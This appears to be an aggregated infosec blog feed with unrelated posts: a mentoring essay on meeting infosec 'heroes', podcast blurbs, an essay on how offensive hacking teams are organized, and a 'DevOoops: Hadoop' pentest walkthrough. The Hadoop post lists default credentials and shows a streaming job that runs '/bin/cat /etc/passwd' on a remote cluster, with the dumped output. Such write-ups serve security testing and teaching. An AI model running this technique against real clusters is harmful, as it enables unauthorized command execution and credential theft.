Takeaways: Understanding your product’s value and your company’s strategy is only part of the battle. Persuading others to support you in this endeavor requires lots of external communications (see How to Be Heard in IT Security and Business). Be ready to spend lots of time writing papers, creating and editing slide decks, drafting and answering emails, speaking on the phone and meeting with people one-on-one and at industry events. And continue to deliver upon product roadmap commitments.

Mentoring: On meeting your **Heroes**

Mentoring: On meeting your  **Heroes**

I put heroes in asterisks because none of us have paparazzi following us around. I regularly use Val Smith's quote about even the most popular infosec person is like being a famous bowler.  Except for rare exceptions, no one outside of our community knows who we are. I've broken into at least one company from every vertical and my neighbor just asks me to help configure his wifi.

This topic came up because the person I'm mentoring met "a famous infosec person" and the guy proceed to be a drunk dbag to him.  It ended up taking quite a bit of wind out of his sail to have someone he kinda looked up to bag on his current career state and talks he was working on.

When I first joined the army how I thought anyone with a "tower of power" (Expert Infantry Badge, Airborne, Air Assault) was an awesome, do no wrong, individual.  Shit, If someone has all this shit on their chest they must be badass right??!!
For more info on badges:

Well the Army does a great job of stacking the people you initially meet as being pretty decent individuals. I think most people think highly of their drill sergeants their entire life.  So the first few people I met that had these badges reaffirmed this belief.  Then I got out and met a few more and was completely let down at the quality of these people.  When I say let down, I mean defeated/totally bothered that these people didn't live up to the pedestal I had put them on. It REALLY bothered me.

What you learn is that in the military you get to wear a badge you earned at any point in your career your entire career.  So maybe as some point someone was awesome enough to earn a badge. This doesn't mean they are a great leader, still good at what the badge means they are good at or even a good person. It means at one point in time they met a criteria and earned a badge.

How does this relate to Infosec?

We are all humans and generally react poorly to any sort of fame.

A good chunk of us are introverts.

The "community" values exploits and clever hacks over being a good person or helping others.

We have people that 10 years later are still riding the vapor trails of some awesome shit they did but havent done anything else relevant since.  Some people have giant egos that only care about you if you are currently in the process of kissing their ass.  To be fair if people ARE kissing your ass its hard not get an ego but you have to work hard to check that shit at the door.

Remember we are famous bowlers?

What can you do?

Check your ego.

Stay Humble.

Help (mentor) others.

Always remember how you felt when that hero dissed you when you are someone else's hero.


Hack Naked News #128 – June 6, 2017

Exploiting Windows 10, mimicking Twitter users, vulnerabilities in new cars, security issues surrounding virtual personal assistants, and more. Jason Wood of Paladin Security joins us to discuss sniffing out spy tools with ridesharing cars on this episode of Hack Naked News!Full Show Notes: for all the latest episodes!

The Offensive Cyber Security Supply Chain

During the past few weeks some people asked me how to build a "cyber security offensive team". Since the recurring question I decided to write a little bit about my point of view and my past experiences on this topic without getting into details (no: procedures, methodologies, communication artifacts and skill set will be provided). 

Years ago a well skilled and malicious actor (let me call him hacker, even if I am perfectly aware this is not the right word) could launch a single and sophisticated attack able to hit significative infrastructures causing large and glaring damages.  Nowadays this scenario is (fortunately) more unlikely since cyber defense technology made huge steps ahead and public/private organizations are teamed in blue teams with cyber security experts. The most doubtful of my readers are probably thinking that offensive technology made a huge steps ahead as well, ad I perfectly agree with you ! However you might probably agree with me that attacks complexity is arising a lot, in fact years ago to perform a successfully cyber attack you didn't need intermediations such anonymizers, malware evasion techniques, fast flux, DGA and -- more generally speaking -- all the required techniques to trick (or illude) blue teams, since no blue teams (or very few of) were existing. My point here is pretty clear, while years ago a single hacker was enough to attack a structured system (for example: ICS, Governative Networks, or Network Corporation) nowadays if you really want to successfully create a cyber security "army" you need a structured group of people. Talented people are very important but not as they were during the past years. On my personal point of view talented people should move from technical operations to organizational operations. I'll try to better explain my point of view following the reading.

The question now gets pretty easy: "What that group does ? And ..  how should it be organized ?".
 A team is usually a group of people that works together in order to reach a common target. The target should be clear to every team member (if you want a performing team) and every team member should share the same team belief to get the tasks done -- in order to quickly reach out the targets.

The group of people making an "offensive cyber security group" is not a "team" (as mentioned before) but it is closed to be a software supply chain where everybody has specific tasks and different targets. Let me putting in this way, if your task is to build a PDF parsing library you don't need to know where your library will be used, since your target is to build a generic and reusable library. Someone could use your library for a nice "automatic invoice maker" or for "injecting malicious javascript into a PDF" and for you (the PDF library writer) nothing should change. For such a reason I would not call this "group of people": Offensive Cyber Security Team but rather Offensive Cyber Security Supply Chain (OCSSC). Every step of the supply chain is made by specific team.
As every supply chain, the OCSSC needs common rules, methodologies and best practices to be shared between the every stages such as:
- Communication Artifacts. What are the artifacts to be exchanged between the supply chain teams?
- Procedures. What are the global procedures that shall be followed between teams ? What the procedures needed intra-team ?
- Tools. What are the most useful tools to be used intra-team ? and what tools to be used extra-team ?
- Skill Sets. What are the skill sets needed for each team ? 
- Recovery procedure. What are the special procedure to recovery plan intra team ?

I am not going into that questions since my goal is not to help my readers in building an OCSSC but contrary is to alert blue teams that offensive people are getting day by day more structured and purposeful. However I will give a broad view on how the OCSSC should be made in 2017.

The following image shows 5 stages representing 5 different teams which shall collaborate together through well known artifacts.

Offensive Cyber Security Supply Chain

I call the first team the Hunters. This team should be able to find new exploitable vulnerabilities on common software. This team needs to have strong infiltrates into hacking community in order to eventually acquire 0Days from 3-parties and to have update and sharpy fuzzers. This team needs a private cloud with intensive computational resources for getting fuzzing to several parallel softwares. It gets feedbacks on how to "fuzz" from community and from the "DEV-stage" team which should indicate to the Hunters what is the most interesting software to investigate for vulnerabilities. On a real life this team could be the one who finds vulnerabilities like for example the infamous MS17-10.

I call the second team: DEV- Stage. This team is mainly made by developers. Aim of dev-stage is to develop droppers starting from exploits. In fact it takes exploits artifacts from the "Hunters" and arm the developed exploit kits and/or weponize the developed worm. The Staging team should be able to answer to the question: "How do I technically infect victims" ? The Dev-Stage gets two artifact as input: one from the Payload team suggesting what kind of dropping method do they need, and the other one from Intruders which will suggest the Staging team to focus more on "web" or more on "physical" or more on "dedicated devices" and son on. On real life this team could be the one who builds exploit kits and or dropping technology such as for example "ethernal blue".

I call the third team DEV- Payload. This team is mainly made by developers and software testers. Aim of DEV- Payload is to build the dropped payload. This team needs to take care about communications channels, system persistence, evasion techniques and extensibility. It gets artifacts from staging team in order to perform deep and well structured tests and feedbacks from Intruders which suggest what functionalities should be developed in order to reach the Intruder's target.  In the real life this team is the one who develops Malware (or RAT) such as for example: WannaCrypt0r or DoublePulsar.

I call the fourth team Intruders. Intruders are the ones who perform the first intrusion actions. This team gets as input artifacts such as: (1) the deployed dev-stage (for example the Exploit Kit to be implanted) and (2) the developed payload (for example the Malware to be dropped on target system). It also gets feedbacks from the social team getting suggestions on what website and/or infrastructure to be attacked. The intruders are not developers but mainly penetration testers people who get access to external sources (such as: public web sites or public infrastructures) and compromise them injecting the Dev-Stage artifacts. The intruders might need to build new infrastructure such as new websites, or new public resources in order to fully arm a target system. In the real life this team could be the one who infects public websites with Exploit Kits such as for example: Angler, Neutrino or Terror EK.

I call the fifth team The Socials. This team is mainly made by communicators, marketing people who are able to perform the following actions: on one site getting and giving light artifacts (A2l) from/to the hacking community in order to get persistence on it and on the other hand to attract targets to the prepared infrastructures (made by intruders). They give feedbacks to intruders in order to move their operations to what really is useful to attacked target. On real life this group is the most close to Human-Intel.

Every team in the Offensive Cyber Security Supply Chain needs to work together but without knowing external team targets. Every team is charged of specific goals. Communication  artifacts, sharing tools, operational tools play fundamental roles in getting things done.  A talented supervisor is needed in order to get smooth communication between teams and to organize the overall supply chain. This is one of the most important roles who must belong to a great leader be able o deal with super talented and technical people. The supervisor should know very well: methodologies, processes, best practices and he shall have a brilliant view of the overall scenario. He shall have an intensive technical and hacking background and he should never stop to learn from other members. Great communication skills are required in order to develop leadership.

My post was about Offensive Cyber Security Supply Chain. The goal of this quick blog post was to move forward common blue teams and defense agencies by increasing their awareness on how OCSSC should be made in 2017. We are currently experiencing a big move forward in OCSSC from single talented individuals to well structured and organized supply chains, we need to enforce and to structure defenses as well.  

DevOoops: Hadoop

What is Hadoop?

"The Apache Hadoop software library is a framework that allows for the distributed processing of large data sets across clusters of computers using simple programming models. It is designed to scale up from single servers to thousands of machines, each offering local computation and storage. Rather than rely on hardware to deliver high-availability, the library itself is designed to detect and handle failures at the application layer, so delivering a highly-available service on top of a cluster of computers, each of which may be prone to failures."

If you've ever heard of've heard of Hadoop.

NFI what i'm talking a bout? Here is a 3minute video on it:

What are common issues with MapReduce / Hadoop?

Hadoop injection points from Kaluzny zeronights talk:


Common defaults admin/admin, cloudera/cloudera

Although occasionally you'll find one that will just let you pick your own :-)

If you gain access, full HDFS access, run queries, etc

HDFS exposes a web server which is capable of performing basic status monitoring and file browsing operations. By default this is exposed on port 50070 on the NameNode. Accessing http://namenode:50070/ with a web browser will return a page containing overview information about the health, capacity, and usage of the cluster (similar to the information returned by bin/hadoop dfsadmin -report).

From this interface, you can browse HDFS itself with a basic file-browser interface. Each DataNode exposes its file browser interface on port 50075.

update:The hadoop attack library is worth checking out.

Most up-to-date presentation on hadoop attack library:

There is a piece around RCE (

You'll need info found in ip:50070/conf

TLDR; find the correct open Hadoop ports and run a map reduce job against the remote hadoop server. 
You need to be able to access the following Hadoop services through the network:
  • YARN ResourceManager: usually on ports 8030, 8031, 8032, 8033 or 8050
  • NameNode metadata service in order to browse the HDFS datalake: usually on port 8020
  • DataNode data transfer service in order to upload/download file: usually on port 50010

Let's see it in action:

lookupfailed-2:hadoop CG$ hadoop jar /usr/local/Cellar/hadoop/2.7.3/libexec/share/hadoop/tools/lib/hadoop-streaming-2.7.3.jar -input /tmp/a.txt -output blah_blah -mapper "/bin/cat /etc/passwd" -reducer NONE

17/01/05 22:11:40 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
packageJobJar: [/var/folders/r8/6hjsj3h92wn82btldp7zlyb40000gn/T/hadoop-unjar5960812935334004257/] [] /var/folders/r8/6hjsj3h92wn82btldp7zlyb40000gn/T/streamjob4422445860444028358.jar tmpDir=null
17/01/05 22:11:41 INFO client.RMProxy: Connecting to ResourceManager at
17/01/05 22:11:41 INFO client.RMProxy: Connecting to ResourceManager at
17/01/05 22:11:43 INFO mapred.FileInputFormat: Total input paths to process : 1
17/01/05 22:11:43 INFO mapreduce.JobSubmitter: number of splits:2
17/01/05 22:11:44 INFO mapreduce.JobSubmitter: Submitting tokens for job: job_1483672290130_0001
17/01/05 22:11:45 INFO impl.YarnClientImpl: Submitted application application_1483672290130_0001
17/01/05 22:11:45 INFO mapreduce.Job: The url to track the job:
17/01/05 22:11:45 INFO mapreduce.Job: Running job: job_1483672290130_0001
17/01/05 22:12:00 INFO mapreduce.Job: Job job_1483672290130_0001 running in uber mode : false
17/01/05 22:12:00 INFO mapreduce.Job:  map 0% reduce 0%
17/01/05 22:12:10 INFO mapreduce.Job:  map 100% reduce 0%
17/01/05 22:12:11 INFO mapreduce.Job: Job job_1483672290130_0001 completed successfully
17/01/05 22:12:12 INFO mapreduce.Job: Counters: 30
File System Counters
FILE: Number of bytes read=0
FILE: Number of bytes written=240754
FILE: Number of read operations=0
FILE: Number of large read operations=0
FILE: Number of write operations=0
HDFS: Number of bytes read=222
HDFS: Number of bytes written=2982
HDFS: Number of read operations=10
HDFS: Number of large read operations=0
HDFS: Number of write operations=4
Job Counters 
Launched map tasks=2
Data-local map tasks=2
Total time spent by all maps in occupied slots (ms)=21171
Total time spent by all reduces in occupied slots (ms)=0
Total time spent by all map tasks (ms)=21171
Total vcore-milliseconds taken by all map tasks=21171
Total megabyte-milliseconds taken by all map tasks=21679104
Map-Reduce Framework
Map input records=1
Map output records=56
Input split bytes=204
Spilled Records=0
Failed Shuffles=0
Merged Map outputs=0
GC time elapsed (ms)=279
CPU time spent (ms)=1290
Physical memory (bytes) snapshot=209928192
Virtual memory (bytes) snapshot=3763986432
Total committed heap usage (bytes)=65142784
File Input Format Counters 
Bytes Read=18
File Output Format Counters 
Bytes Written=2982
17/01/05 22:12:12 INFO streaming.StreamJob: Output directory: blah_blah

lookupfailed-2:hadoop CG$ hadoop fs -ls blah_blah
17/01/05 22:12:22 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable
Found 3 items
-rw-r--r--   3 root supergroup          0 2017-01-05 22:12 blah_blah/_SUCCESS
-rw-r--r--   3 root supergroup       1491 2017-01-05 22:12 blah_blah/part-00000
-rw-r--r--   3 root supergroup       1491 2017-01-05 22:12 blah_blah/part-00001

lookupfailed-2:hadoop CG$ hadoop fs -cat blah_blah/part-00001
17/01/05 22:12:49 WARN util.NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false

Walks you thru how to get reverse shells or meterpreter shells (windows) if you can run commands.


video of above talk from appsecEU 2015

What did I miss?  Anything to add?

Enterprise Security Weekly #47 – You Burn, You Learn

Corey Bodzin of Tenable joins us. In the news, the power of exploits, Carbon Black’s open letter to Cylance, security measures increase due to ransomware attacks, and more in this episode of Enterprise Security Weekly!Full Show Notes: for all the latest episodes!